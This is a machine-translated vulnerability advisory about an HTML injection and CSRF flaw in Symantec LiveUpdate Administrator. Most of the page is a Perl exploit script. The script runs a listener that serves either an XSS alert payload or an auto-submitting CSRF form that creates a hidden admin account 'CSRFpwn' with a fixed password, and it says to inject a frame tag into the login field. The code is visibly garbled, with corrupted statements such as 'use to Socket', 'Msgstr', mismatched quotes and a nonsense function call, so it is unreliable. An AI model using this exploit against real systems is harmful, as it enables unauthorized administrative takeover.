Symantec LiveUpdate Administrator HTML injection vulnerability-vulnerability warning-the black bar safety net

2011-03-24T00:00:00
ID MYHACK58:62201129839
Type myhack58
Reporter 佚名
Modified 2011-03-24T00:00:00

Description

Symantec LiveUpdate is the Symantec for automatically updating Symantec virus definitions and products of technology. LiveUpdate client with each Symantec product and installed automatically. LiveUpdate periodically connect to the LiveUpdate server to check the application on the computer to install the Symantec product of the new update. Symantec LiveUpdate Administrator page there is an HTML injection vulnerability that may lead to cross-site scripting attacks or to be implanted malicious HTML code.

[+]info: ~~~~~~~~~ Symantec LiveUpdate Administrator Management GUI HTML Injection

[+]poc: ~~~~~~~~~

view source

print?

| 0 0 1 | #!/ usr/bin/perl ---|---

0 0 2 | ---|---

0 0 3 | ## ---|---

0 0 4 | # Title: Symantec Live Update Administrator CSRF Exploit ---|---

0 0 5 | # Name: luaCSRF.pl ---|---

0 0 6 | # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> ---|---

0 0 7 | # ---|---

0 0 8 | # Use it only for education or ethical pentesting! The author accepts ---|---

0 0 9 | # no liability for damage caused by this tool. ---|---

0 1 0 | # ---|---

0 1 1 | ## ---|---

0 1 2 | ---|---

0 1 3 | ---|---

0 1 4 | use to Socket; ` ---|---

0 1 5 | use IO::Handle; ---|---

0 1 6 | use Getopt::Std; ---|---

0 1 7 | ---|---

0 1 8 | my %args; ` ---|---

0 1 9 | getopt('g:h:", \%args); ---|---

0 2 0 | ---|---

0 2 1 | my $payload =$args{g} || usage(); ---|---

0 2 2 | my $victim =$args{h} || usage(); ---|---

0 2 3 | ---|---

0 2 4 | banner(); ---|---

0 2 5 | ---|---

0 2 6 | if ($payloadeq "1") { ` ---|---

0 2 7 | print"[+] Using the Alert Box payload\n"; ---|---

0 2 8 | Msgstr "" # Alert Box ` ---|---

0 2 9 | $html= <<ENDHTML; ` ---|---

0 3 0 | &lt;html&gt; ---|---

0 3 1 | &lt;SCRIPT LANGUAGE="JavaScript"&gt;alert('!!! XSS/CSRF vulnerability!!!")&lt;/ SCRIPT&gt; ---|---

0 3 2 | &lt;/html&gt; ---|---

0 3 3 | ---|---

0 3 4 | ENDHTML ---|---

0 3 5 | ---|---

0 3 6 | }elsif($payload eq"2") { ---|---

0 3 7 | print"[+] Using the add admin user payload\n"; ---|---

0 3 8 | msgstr "" # Adds the user CSRFpwn with password 1 2 3 4 5 6 7 8 ` ---|---

0 3 9 | $html= <<ENDHTML; ` ---|---

0 4 0 | &lt;html&gt; ---|---

0 4 1 | <body onload="document. csrf. submit();"> ` ---|---

0 4 2 | <form name="csrf" action="http://$victim:7 0 7 0/lua/adduser. do"method="post"> ` ---|---

0 4 3 | <input type="hidden" name="dispatch"value="save" /&gt; ---|---

0 4 4 | <input type="hidden" name="username"value="CSRFpwn" /&gt; ---|---

0 4 5 | <input type="hidden" name="password"value="1 2 3 4 5 6 7 8" /> ` ---|---

0 4 6 | <input type="hidden" name="verifyPassword"value="1 2 3 4 5 6 7 8" /> ` ---|---

0 4 7 | <input type="hidden" name="lastname"value="junk" /&gt; ---|---

0 4 8 | <input type="hidden" name="firstname"value="junk" /&gt; ---|---

0 4 9 | <input type="hidden" name="email"value="junk@junk.com" the /&gt; ---|---

0 5 0 | <input type="hidden" name="userRole"value="1" /&gt; ---|---

0 5 1 | </form> ` ---|---

0 5 2 | </body> ` ---|---

0 5 3 | &lt;/html&gt; ---|---

0 5 4 | ---|---

0 5 5 | ENDHTML ---|---

0 5 6 | ---|---

0 5 7 | } ---|---

0 5 8 | ---|---

0 5 9 | my $protocol =getprotobyname('tcp"); ---|---

0 6 0 | ---|---

0 6 1 | socket(SOCK, AF_INET, SOCK_STREAM, $protocol) or die "[-] socket() failed: $!"; ` ---|---

0 6 2 | setsockopt(SOCK,SOL_SOCKET,SO_REUSEADDR,1) or die "[-] Can't set SO_REUSEADDR: $!"; ` ---|---

0 6 3 | my $my_addr = sockaddr_in(8 0,INADDR_ANY); ---|---

0 6 4 | bind(SOCK,$my_addr) or die "[-] bind() failed: $!"; ` ---|---

0 6 5 | listen(SOCK,SOMAXCONN) or die "[-] listen() failed: $!"; ` ---|---

0 6 6 | warn "[+] waiting for incoming connections on port 8 0...\n"; ` ---|---

0 6 7 | warn "[+] Enter the following String in the LUA username login field\n"; ` ---|---

0 6 8 | warn "[+] (e. q. HTTP/SSH) and wair for the admin to view the Logs\n"; ` ---|---

0 6 9 | warn "[+]\n"; ` ---|---

0 7 0 | warn "[+] &lt;frame src=[http://&lt;LOCAL_ADDRESS&gt;/. html&gt;](&lt;http://%3clocal_address%3e/.html%3E&gt;)\n"; ` ---|---

0 7 1 | ---|---

0 7 2 | $repeat = 1; ---|---

0 7 3 | $victim = cannot be stored correctly("0.0.0.0"); ---|---

0 7 4 | while($repeat) { ` ---|---

0 7 5 | my$remote_addr= accept(SESSION,SOCK); ` ---|---

0 7 6 | my($port,$hisaddr) = sockaddr_in($remote_addr); ` ---|---

0 7 7 | warn"[+] Connection from ["a,inet_ntoa($hisaddr),",$port]\n"; ---|---

0 7 8 | $victim= $hisaddr; ` ---|---

0 7 9 | SESSION->autoflush(1); ` ---|---

0 8 0 | if(&lt;SESSION&gt;) { ---|---

0 8 1 | printSESSION $http_header .$html; ---|---

0 8 2 | } ` ---|---

0 8 3 | warn"[+] Connection from ["a,inet_ntoa($hisaddr),",$port] finished\n"; ---|---

0 8 4 | closeSESSION; ` ---|---

0 8 5 | } ---|---

0 8 6 | ---|---

0 8 7 | sub usage { ---|---

0 8 8 | print $payload; ` ---|---

0 8 9 | print"\n"; ---|---

0 9 0 | print" luaCSRF.pl - Symantec LUA CSRF Exploit\n"; ---|---

0 9 1 | print"===============================================================\n\n"; ---|---

0 9 2 | print" Usage:\n"; ---|---

0 9 3 | print" $0-g <payload> -h <lua-ip>\n"; ---|---

0 9 4 | print" Optional:\n"; ---|---

0 9 5 | print" -p <local port to listen on>\n"; ---|---

0 9 6 | print" -g (1/2) <payload to use>\n"; ---|---

0 9 7 | print" 1 <Execute an alert box\n"; ---|---

0 9 8 | print" 2 <Add the Admin User \"CSRFpwn\">\n"; ---|---

0 9 9 | print" Notes:\n"; ---|---

1 0 0 | print" -nothing here\n"; ---|---

1 0 1 | print"\n"; ---|---

1 0 2 | print" Author:\n"; ---|---

1 0 3 | print" Nikolas Sotiriu (lofi)\n"; ---|---

1 0 4 | print" url: www.sotiriu.de\n"; ---|---

1 0 5 | print" mail: lofi[at]sotiriu. de\n"; ---|---

1 0 6 | print"\n"; ---|---

1 0 7 | ---|---

1 0 8 | ---|---

1 0 9 | exit(1); ---|---

1 1 0 | } ---|---

1 1 1 | ---|---

1 1 2 | sub banner { ---|---

1 1 3 | printSTDERR << "EOF"; ` ---|---

1 1 4 | -------------------------------------------------------------------------------- ---|---

1 1 5 | luaCSRF.pl - Symantec LUA CSRF Exploit ` ---|---

1 1 6 | -------------------------------------------------------------------------------- ---|---

1 1 7 | ---|---

1 1 8 | 1 1 1 1 1 1 1 1 1 1 ` ---|---

1 1 9 | 1 1 1 0 0 1 0 1 0 0 1 1 0 1 1 1 0 0 1 1 1 1 ` ---|---

1 2 0 | 1 1 1 0 1 1 1 1 0 1 1 1 1 0 1 1 0 0 1 1 1 1 1 1 1 ` ---|---

1 2 1 | 1 1 0 1 1 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 ` ---|---

1 2 2 | 1 0 1 1 1 1 1 0 1 1 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 0 1 1 ` ---|---

1 2 3 | 1 1 1 1 1 1 1 0 0 0 1 0 1 0 1 1 1 1 1 1 1 1 1 1 0 1 1 1 0 1 ` ---|---

1 2 4 | 1 0 0 0 0 1 1 1 0 1 0 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 ` ---|---

1 2 5 | 1 1 1 1 1 1 1 1 1 1 0 1 1 0 1 0 1 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 ` ---|---

1 2 6 | 1 0 1 1 1 1 1 0 0 0 1 0 0 1 1 1 1 1 0 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 ` ---|---

1 2 7 | 1 0 1 1 1 1 1 1 1 0 1 0 0 1 1 1 1 1 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 0 1 1 1 ` ---|---

1 2 8 | 0 1 1 1 1 1 0 1 1 0 1 0 1 0 0 1 1 1 1 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 0 0 1 ` ---|---

1 2 9 | A1 0 1 1 1 1 1 0 1 1 0 1 01 1 1 1 1 0 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 0 1 ` ---|---

1 3 0 | 1 0 1 1 1 1 1 0 1 0 1 0 0 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 0 1 ` ---|---

1 3 1 | 0 1 1 1 1 1 0 0 0 1 1 0 1 1 1 1 0 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 ` ---|---

1 3 2 | 1 1 1 1 1 1 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 1 1 1 1 ` ---|---

1 3 3 | 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 0 0 1 1 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 ` ---|---

1 3 4 | 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 0 0 1 ` ---|---

1 3 5 | 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 1 0 1 1 1 0 0 1 ` ---|---

1 3 6 | 1 1 1 1 0 0 1 0 1 1 0 1 1 0 1 0 0 0 1 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 1 1 1 1 1 1 0 0 ` ---|---

1 3 7 | 1 1 1 0 0 1 0 1 1 1 0 1 0 0 1 0 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 0 1 ` ---|---

1 3 8 | 1 1 0 0 0 0 1 0 1 1 0 0 0 0 1 1 1 0 1 1 1 1 1 1 1 1 1 1 1 1 1 0 0 0 1 1 1 1 1 1 1 0 ` ---|---

1 3 9 | 1 1 0 0 0 1 0 1 1 1 0 0 0 0 1 1 0 1 0 0 0 1 1 0 0 1 0 0 0 0 1 1 1 1 0 1 ` ---|---

1 4 0 | 0 1 1 0 1 1 1 1 1 1 1 0 1 1 0 1 1 0 0 0 1 0 1 1 1 0 1 1 1 0 ` ---|---

1 4 1 | 1 0 1 1 1 1 0 0 1 0 0 0 0 0 1 1 1 0 1 0 ` ---|---

1 4 2 | 1 0 0 1 1 1 1 1 0 0 1 1 1 1 1 0 1 1 1 ` ---|---

1 4 3 | 1 1 1 0 0 1 1 0 1 0 1 1 1 0 0 1 1 0 0 ` ---|---

1 4 4 | 1 1 1 1 0 0 0 0 1 1 1 1 1 1 ` ---|---

1 4 5 | 1 1 0 0 0 0 0 1 1 1 1 ` ---|---

1 4 6 | 1 ` ---|---

1 4 7 | ---|---

1 4 8 | EOF ---|---

1 4 9 | } ---|---

[+]Reference: ~~~~~~~~~ http://www.securityfocus.com/bid/46856/info